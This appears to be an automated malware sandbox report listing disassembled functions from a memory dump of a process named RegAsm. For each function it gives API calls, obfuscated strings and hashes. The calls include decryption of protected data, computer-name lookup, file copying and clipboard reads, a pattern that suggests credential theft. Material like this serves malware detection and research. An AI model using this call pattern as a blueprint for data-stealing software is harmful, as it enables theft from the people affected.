                          • Opcode ID: 17b1c972bd5d4324f82aae2a25e503d7fc9efe7fc73f3fb4394cad4a3cfe7439
                          • Instruction ID: 7f445f716dfeb872be7e3e2942958d1a2f027dffcd5dd8ff26c4465676a265c2
                          • Opcode Fuzzy Hash: 17b1c972bd5d4324f82aae2a25e503d7fc9efe7fc73f3fb4394cad4a3cfe7439
                          • Instruction Fuzzy Hash: 0A91BDB154D3D18FD331CF29D4907EBBBE1AB96304F14896DD0DA5B382DA39480A8B97

                          Control-flow Graph

                          control_flow_graph 40e4af: rendered graph omitted; basic blocks 40e4af-40e751; API call CoUninitialize.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Uninitialize
                          • String ID: %>?$7(6 $=$10$T|2
                          • API String ID: 3861434553-3970780521
                          • Opcode ID: 850fe3248efb4ac56c1d4687eb20485ed2fcb756a54de3d014a812383dd949de
                          • Instruction ID: 92f2906561030d20e4974ae0f3e2c5ce2d8a325bbd40e4d19a7462f81e4708f7
                          • Opcode Fuzzy Hash: 850fe3248efb4ac56c1d4687eb20485ed2fcb756a54de3d014a812383dd949de
                          • Instruction Fuzzy Hash: D651167550C3D28AD3258B26D4507ABBFE2AFA3300F5C8C6ED4C9A7382D77988098756

                          Control-flow Graph

                          control_flow_graph 408a70: rendered graph omitted; basic blocks 408a70-408c1c; API calls SHGetSpecialFolderPathW, GetCurrentThreadId, GetCurrentProcessId, GetForegroundWindow, ExitProcess; subcalls 43cf40, 435d50, 43e350, 409e00, 40cd40, 40bae0.
                          APIs
                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408A92
                          • GetCurrentThreadId.KERNEL32 ref: 00408AA5
                          • GetCurrentProcessId.KERNEL32 ref: 00408AF8
                          • GetForegroundWindow.USER32 ref: 00408B62
                            • Part of subcall function 0040CD40: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CD53
                            • Part of subcall function 0040BAE0: FreeLibrary.KERNEL32(00408C15), ref: 0040BAE6
                            • Part of subcall function 0040BAE0: FreeLibrary.KERNEL32 ref: 0040BB07
                          • ExitProcess.KERNEL32 ref: 00408C1C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                          • String ID:
                          • API String ID: 3072701918-0
                          • Opcode ID: b6c3b0a77390ba7a6dfcba04f710edca301b5b945b6146972dba92d56e1b716d
                          • Instruction ID: d3a72b71d84b3b02ec3761c03409b60bdcfe6a7a07409fb054609b6c9cc15e35
                          • Opcode Fuzzy Hash: b6c3b0a77390ba7a6dfcba04f710edca301b5b945b6146972dba92d56e1b716d
                          • Instruction Fuzzy Hash: 6B412777F407190BD7286AA9DD8A366B5964BC4711F0A413EAA84EB3D2FDFC8C0446C8

                          Control-flow Graph

                          control_flow_graph 42d304: rendered graph omitted; basic blocks 42d304-42d90f; API call GetComputerNameExA (two call sites); subcalls 4402f0, 4319e0.
                          APIs
                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042D423
                          • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042D4EF
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ComputerName
                          • String ID:
                          • API String ID: 3545744682-0
                          • Opcode ID: b19bbbee5f47dadc0b832df9eaf1bee1b64d03f900b39eb79acd8ed5907b8eef
                          • Instruction ID: 89e4f82b84a28f81d5a6469b3470d4e63a59147a0d84765ae0e0f3c6f7d63153
                          • Opcode Fuzzy Hash: b19bbbee5f47dadc0b832df9eaf1bee1b64d03f900b39eb79acd8ed5907b8eef
                          • Instruction Fuzzy Hash: 0EE1C720608B918EE725CB39D4507B3BBE19F67304F58889EC4EA8B387D779A409C765

                          Control-flow Graph

                          control_flow_graph 4277c0: rendered graph omitted; basic blocks 4277c0-427c87; subcalls 43e420 (LdrInitializeThunk wrapper), 43bb20 (RtlAllocateHeap wrapper), 43bb70 (RtlFreeHeap wrapper), 408440, 408450, 409130.
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: ;:=<
                          • API String ID: 2994545307-1779823811
                          • Opcode ID: 1334f79235220ba33ac831f84196b83910ab924fbf5405a7c2f169c4aab764d1
                          • Instruction ID: b9df0df8ec96dde64e0b3a4675888c70f5e30a26a888c7ed3d759d3b3fdc126a
                          • Opcode Fuzzy Hash: 1334f79235220ba33ac831f84196b83910ab924fbf5405a7c2f169c4aab764d1
                          • Instruction Fuzzy Hash: CAC16A72B0C3208BD714CB29D84163BB7D2EBD5314F59857ED88A8B385D679ED02C78A
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00419491
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CryptDataUnprotect
                          • String ID:
                          • API String ID: 834300711-0
                          • Opcode ID: 67066d79f2e0e2c556ddced3fbca7fcfc7bbba99d09ee7c06a8ed8b3fd2b2a06
                          • Instruction ID: 2f515dfc4c4df483a9c515854f49534d3ffdd9ab5ad4ae8a739720e01657628b
                          • Opcode Fuzzy Hash: 67066d79f2e0e2c556ddced3fbca7fcfc7bbba99d09ee7c06a8ed8b3fd2b2a06
                          • Instruction Fuzzy Hash: E65108B15083558FC724CF69C4D12ABBBE1AF99304F08496EE4E987382D239DD45CB56
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-3019521637
                          • Opcode ID: 1337c2d53c43d85541e2160734128aa11c282de89a300e4156288c8f50bcbfb4
                          • Instruction ID: 10dcefb1d69153240ead42e29cb6c44a97267fa514bdd6c96bec7f4ae6184812
                          • Opcode Fuzzy Hash: 1337c2d53c43d85541e2160734128aa11c282de89a300e4156288c8f50bcbfb4
                          • Instruction Fuzzy Hash: A7917937B043114BE7189E68CC8267BB7E3EBC9304F1D953DD99593391EAB89C058789
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: FGFA
                          • API String ID: 2994545307-1293343293
                          • Opcode ID: 338c331d98de2080d3cc373bd636463768723e52d7fccd1f0fed820e67ba5b8b
                          • Instruction ID: d82890ae5b8405dd5d772d792f4ed481fd850e875cd217ff149d6bf94a1c741a
                          • Opcode Fuzzy Hash: 338c331d98de2080d3cc373bd636463768723e52d7fccd1f0fed820e67ba5b8b
                          • Instruction Fuzzy Hash: 0E7138716083009BE728CF24D891A7BB7E2EBD5344F18893DE996473A1DB38D885C749
                          APIs
                          • LdrInitializeThunk.NTDLL(00440F42,005C003F,00000008,00000018,?), ref: 0043E44E
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: 5|iL
                          • API String ID: 2994545307-1880071150
                          • Opcode ID: 1578b8eaa752ad71c318a274595036bf3ea4456157c48e53902889dd4741d643
                          • Instruction ID: 6dd94c4376c72eaa9512bdfb30cf4860a9d07aabf8ea00ee791b3781dee47efc
                          • Opcode Fuzzy Hash: 1578b8eaa752ad71c318a274595036bf3ea4456157c48e53902889dd4741d643
                          • Instruction Fuzzy Hash: 68412975715301AFF7148F25EC81B37B7E6EB85344F28452EE280873A5E678E890875D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9ab38bd6cec5db73bcef0a96c5f6ebba2909499636b8e1f76d9be44b8248d6f1
                          • Instruction ID: 815013dd8d55479357c847a7de1601a9ecbb677cc3027380411dfb722df17a6b
                          • Opcode Fuzzy Hash: 9ab38bd6cec5db73bcef0a96c5f6ebba2909499636b8e1f76d9be44b8248d6f1
                          • Instruction Fuzzy Hash: 69613632B04301ABD728CF18DC81B6BB7E2EFD5350F19852EE5858B365EB38D850874A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e6b5e08f9041a5aefe18e589cb7c56b4c5957cab1d47971e66b085f206ab3dbc
                          • Instruction ID: e107110464568c6d81bcb4f09fecce986dab2e9b73150605e9f7cbbdcbce5b28
                          • Opcode Fuzzy Hash: e6b5e08f9041a5aefe18e589cb7c56b4c5957cab1d47971e66b085f206ab3dbc
                          • Instruction Fuzzy Hash: 6B511772A513644BDB54CF68CD897DE7B32AB96300F1842E9C9847B246CB780E45CB84
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bfc3a67e5b2ad3164977090e58aba5a105025c03ffe3068a1343ced494e92333
                          • Instruction ID: 1fa01920aa2e6fcc8fe30a53230af68cef853f403f28198226460abcb875f5b2
                          • Opcode Fuzzy Hash: bfc3a67e5b2ad3164977090e58aba5a105025c03ffe3068a1343ced494e92333
                          • Instruction Fuzzy Hash: F6413679A08310EFE310DF25EC8161F77E4EB8A318F55843EFA8583282DB7599098797

                          Control-flow Graph (graph rendering not recoverable as text; the original marks nodes as Executed / Not Executed): function starting at 42d30b, with calls to sub_4402f0, FreeLibrary, GetComputerNameExA and sub_4319e0
                          APIs
                          • FreeLibrary.KERNEL32(?), ref: 0042D3E7
                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042D423
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ComputerFreeLibraryName
                          • String ID:
                          • API String ID: 2904949787-0
                          • Opcode ID: 91702c7460f3ea3bf4d01a5b60907db3589e9077fd064fd8907a4202272a672a
                          • Instruction ID: c668425f42623d5c4cbfc84636ffe6d391bf7abc2db824b82279399dc59abe95
                          • Opcode Fuzzy Hash: 91702c7460f3ea3bf4d01a5b60907db3589e9077fd064fd8907a4202272a672a
                          • Instruction Fuzzy Hash: C5D1B460608B918EE7258F35D460BB3BBE19F27304F58489EC5EB87293D7796409CB26
                          APIs
                          • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,00000001,?,00000000,?,?,0040BA1A,00000000,00000001,?,00000000,?,00000000), ref: 0043E3DB
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: a7ff0f798fc30b76f792086ad38cbd0beafc262cb4d4de1013c7cd7c48cde5aa
                          • Instruction ID: 8a7d37f52372a3ed27f7298983152f214c485853710a149744c9cc568332bd43
                          • Opcode Fuzzy Hash: a7ff0f798fc30b76f792086ad38cbd0beafc262cb4d4de1013c7cd7c48cde5aa
                          • Instruction Fuzzy Hash: CD0168796083419BD3009B26FC51B6BBB9EEFDB315F184039E94583741CA3AAC16C396
                          APIs
                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043BBD8
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 8d9fd6ef3cdb193d8b3789759a94b763c2d9e2e0f2e5a70ab70441a6e758872c
                          • Instruction ID: e5c94070d7be715cae25744535c21d30189543ffbabb06430699a339effd1bca
                          • Opcode Fuzzy Hash: 8d9fd6ef3cdb193d8b3789759a94b763c2d9e2e0f2e5a70ab70441a6e758872c
                          • Instruction Fuzzy Hash: 1FF059B8B091108FD304DB14FC10A3BBBD5EBDA324F1A803CE0858A796D6308C01CB86
                          APIs
                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043BB60
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 6222587eb63aec0e9e6e5b0661e6e2458e94e8f3d2309b5164a83277eee18734
                          • Instruction ID: f31c5af4229bae75d383888768342b37ffc4cc1a62a4ebab35f5a50810103b6c
                          • Opcode Fuzzy Hash: 6222587eb63aec0e9e6e5b0661e6e2458e94e8f3d2309b5164a83277eee18734
                          • Instruction Fuzzy Hash: 60E0D83050C3404FD7066B24E8A6B2ABFA2EB96B14F60456CE4C1473E2CA365C2BCB57
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: BlanketProxy
                          • String ID:
                          • API String ID: 3890896728-0
                          • Opcode ID: 2a12333dd22575aa26cb5ced0141f8cbb95bbe0f2fef6aef6fd922132291aa15
                          • Instruction ID: f4578040463029fd206be13c71bfcd013365946abaacd1db1e9905d356089b32
                          • Opcode Fuzzy Hash: 2a12333dd22575aa26cb5ced0141f8cbb95bbe0f2fef6aef6fd922132291aa15
                          • Instruction Fuzzy Hash: 6AF01D74A483418FE314DF24C49875ABBE1EBC4304F10895DE5948B790CBB59648CF86
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: BlanketProxy
                          • String ID:
                          • API String ID: 3890896728-0
                          • Opcode ID: 827844dc8d69ddff0662615ca8cc6eb72eb5c84a5e5e6005d271f688d27f7df8
                          • Instruction ID: 4291cfd54b30b210e79bceb8c8d378b9125f638b093c55bebcd8583c723f5694
                          • Opcode Fuzzy Hash: 827844dc8d69ddff0662615ca8cc6eb72eb5c84a5e5e6005d271f688d27f7df8
                          • Instruction Fuzzy Hash: 15F0B7B41097018FE304DF28C5A871ABBF0FB89308F10481CE1968B3A0DB75AA48CF82
                          APIs
                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CD53
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Initialize
                          • String ID:
                          • API String ID: 2538663250-0
                          • Opcode ID: f1eefa1e2715ee8e2ff37698e3af7a915f3b6bd3fa32b9f9d666b28f3977ec7e
                          • Instruction ID: 07c29162f38ee33b17f71475a022d17df7fc23ef7cfd2a8f3c81aa62a753a06a
                          • Opcode Fuzzy Hash: f1eefa1e2715ee8e2ff37698e3af7a915f3b6bd3fa32b9f9d666b28f3977ec7e
                          • Instruction Fuzzy Hash: E5E0C236B9114417E314BB18DC0BF46362A83C3731F08C236A255C67C4DC28D805C2A6
                          APIs
                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CD90
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeSecurity
                          • String ID:
                          • API String ID: 640775948-0
                          • Opcode ID: eff080751637ce3825c0043289b774b8fcb52c3ad225c83be113463185c7acaa
                          • Instruction ID: 3f0139b8e32ca54a791a6843e812a05b786a47bc7fe22565ae8806df4a9aca9a
                          • Opcode Fuzzy Hash: eff080751637ce3825c0043289b774b8fcb52c3ad225c83be113463185c7acaa
                          • Instruction Fuzzy Hash: BED092347C4341B6EA68DB08AC53F1432115303F52F314628B362EE2E5C9E061118A1D
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 9yG$Y>[$.y-{$2q s$3c?a$3w+u$5u w$:<$<o0m$?s,q$@=g?$BUB$RUB$Sg/e$W9Q;$X5Y7$[O$\]$`Qo_$`a$l]f[$pInW$q%e'$s!u#$uEsC$vN${u$|-z/$Q_
                          • API String ID: 0-3750274029
                          • Opcode ID: 92e364e5da0e89b5e2c9cf0d797657a3b5a3af905b9ea4ad65fcc6e156b3464b
                          • Instruction ID: 5ac324ea4a72efb1c0e64a034cd5d4e5955bd14a257644c688f756931cb9cd25
                          • Opcode Fuzzy Hash: 92e364e5da0e89b5e2c9cf0d797657a3b5a3af905b9ea4ad65fcc6e156b3464b
                          • Instruction Fuzzy Hash: 12825FB55093819BE334CF11E881BEBBBE1FB86344F408A2DD6D99B241DB748446CF96
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 9yG$Y>[$.y-{$2q s$5u w$:<$@=g?$BUB$RUB$W9Q;$X5Y7$[O$\]$`Qo_$`a$l]f[$pInW$q%e'$s!u#$uEsC$vN${u$|-z/$Q_
                          • API String ID: 0-2601126255
                          • Opcode ID: 30d1a1606326d07f2d8d30286cde889be6ce881e1d8216ed3a02a6de3c766cf9
                          • Instruction ID: 1f9792d30e5dc87b445a3f9c6be40305c731601921a44a64e60cab06b5220c61
                          • Opcode Fuzzy Hash: 30d1a1606326d07f2d8d30286cde889be6ce881e1d8216ed3a02a6de3c766cf9
                          • Instruction Fuzzy Hash: 4E9260B56093819FE334CF11E880BABBBE1FB86344F41892DD6C99B251DB748446CF96
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 9yG$Y>[$.y-{$2q s$5u w$:<$@=g?$BUB$RUB$W9Q;$X5Y7$[O$\]$`Qo_$`a$l]f[$pInW$q%e'$s!u#$uEsC$vN${u$|-z/$Q_
                          • API String ID: 0-2601126255
                          • Opcode ID: 2a662cd9e502a88f408f5537358a265835d9a6d63c3f09aaf0a14ef6dd8db4e6
                          • Instruction ID: 3f1884a41b76af52d70204986f6b11e9b34086b7b54899efdde232d0b1a8db8d
                          • Opcode Fuzzy Hash: 2a662cd9e502a88f408f5537358a265835d9a6d63c3f09aaf0a14ef6dd8db4e6
                          • Instruction Fuzzy Hash: C6724EB56093819BE334CF15E880BEBBBE0BB86344F40892DD6D99B241DB748446CF96
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: _fV$'$ "$.kG$0 ..$7d[Y$QSeh$WnK{$[ptv$kRo_$o$f$pDyy$rsC@$uwyT$}$(`
                          • API String ID: 0-1340030871
                          • Opcode ID: 6ba73bf0097c3be3ee3b6578bb71018bb33be576f157c5576b6f39946b6d443b
                          • Instruction ID: 5fffecbda7cbc7b460104305e8243ccb5fb6ca6385620283a739c42bfb3ed6fe
                          • Opcode Fuzzy Hash: 6ba73bf0097c3be3ee3b6578bb71018bb33be576f157c5576b6f39946b6d443b
                          • Instruction Fuzzy Hash: 04621170604B918FC735CF29D490627BBE1BF95304B588A6EC4E68BB93D738E846CB54
                          APIs
                          • CopyFileW.KERNEL32(00000000,?,00000000,?,?,?,?,yhKH 0M::,g@mYU-1X(&), ref: 00428978
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CopyFile
                          • String ID: 0M:$1X(&$:,g@$;:=<$=(05$=(05yhKH 0M::,g@mYU-1X(&$L#L-$mYU-$yhKH
                          • API String ID: 1304948518-1839588596
                          • Opcode ID: 7e13ca6f808b2bc6bd2b8665dea8e0fc6a964b54b4b8c885267d63d5a6a599b7
                          • Instruction ID: 29340e41837ad6d3de6b008828bb1df49b62f07a875fabe1b4272e794f794163
                          • Opcode Fuzzy Hash: 7e13ca6f808b2bc6bd2b8665dea8e0fc6a964b54b4b8c885267d63d5a6a599b7
                          • Instruction Fuzzy Hash: E0D1F0B9E00616CFDB14CF68D88166EB7B1FF89304F58816ED405AB351EB34A952CBD8
                          APIs
                          • CopyFileW.KERNEL32(00000000,?,00000000,?,?,?,?,yhKH 0M::,g@mYU-1X(&), ref: 00428978
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CopyFile
                          • String ID: 0M:$1X(&$:,g@$;:=<$=(05$=(05yhKH 0M::,g@mYU-1X(&$L#L-$mYU-$yhKH
                          • API String ID: 1304948518-1839588596
                          • Opcode ID: 8395b2ff723097783f37449b486a51335824c06b05f9ef334af531377daae234
                          • Instruction ID: 180dd6a639ffca2a901490a16017f2abe53e3b3af0fb2eee3fc12670b9eb8d5c
                          • Opcode Fuzzy Hash: 8395b2ff723097783f37449b486a51335824c06b05f9ef334af531377daae234
                          • Instruction Fuzzy Hash: 13B100B9A00216CFDB14CF28D84066EB7B1FF4A304F1981ADD405AB351EB35AD52CBD8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: )x$CEa~$C}yD$FyOA$P$^!$`|Vz$9$
                          • API String ID: 0-1872272304
                          • Opcode ID: 7eba135c86ffd7cc95433c9f1a24ca243a7e8e9c30315bf08df24b183b5bbefe
                          • Instruction ID: 7358a85e4f1b823aa5a40fd208cc153005ab7fcb3a2e79ac82dfdcee323e6701
                          • Opcode Fuzzy Hash: 7eba135c86ffd7cc95433c9f1a24ca243a7e8e9c30315bf08df24b183b5bbefe
                          • Instruction Fuzzy Hash: 91C104325183918AD311CF29C45076BBBE1AF97344F0949AED8D4AB393D73AC909CB96
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: $(''$)-$"$fi<b$h@KJ$u@wB$x}KH$yrt@$~FCs
                          • API String ID: 0-2904395653
                          • Opcode ID: 5ea25fac44711d14ca98305bc12f104743946438d3f160ddf0d10589975b9041
                          • Instruction ID: 7f5f47f6125ba2d91d2036908e94d2695878a208deecc13d885392006dd65dab
                          • Opcode Fuzzy Hash: 5ea25fac44711d14ca98305bc12f104743946438d3f160ddf0d10589975b9041
                          • Instruction Fuzzy Hash: 1891F5B0604B908BD3398F35D8917A7BBE2AF97304F58995DC0EB4B385C7386405CB59
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: )Jmi$1Spt$BLJN$MlB$PnoL$[VQa$_fXl$x
                          • API String ID: 0-3329954981
                          • Opcode ID: bffe4769d9428dfeb9ce58624dac6c874f0d27eea85e15fd6356625d1823aa27
                          • Instruction ID: 0d9bc49bd01bd19d5d4c9f85ac95da40e29244f73e8c515b28de0e08d5a7ffe0
                          • Opcode Fuzzy Hash: bffe4769d9428dfeb9ce58624dac6c874f0d27eea85e15fd6356625d1823aa27
                          • Instruction Fuzzy Hash: A8515A327193A28BD730CA2490513E7FBE1EF56340F9A863EC585C7385D738A506D78A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: ""$2$7Rn~$Iy~s$obwa$ujcw$yd-K$yrtp
                          • API String ID: 0-1936000690
                          • Opcode ID: 45f60b8723551f83df897f121c5c623d2ff92b384759331cb993cd8d9bfebb53
                          • Instruction ID: a5d2def4d44e7aaff2e8781055e5261c298c51011e5ec9ecc35440d40ca5e48a
                          • Opcode Fuzzy Hash: 45f60b8723551f83df897f121c5c623d2ff92b384759331cb993cd8d9bfebb53
                          • Instruction Fuzzy Hash: 44F136B560C3518FD714DF24E89126BBBE1AF86304F08887DE5C587352EB39D90ACB96
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                          • String ID:
                          • API String ID: 2832541153-0
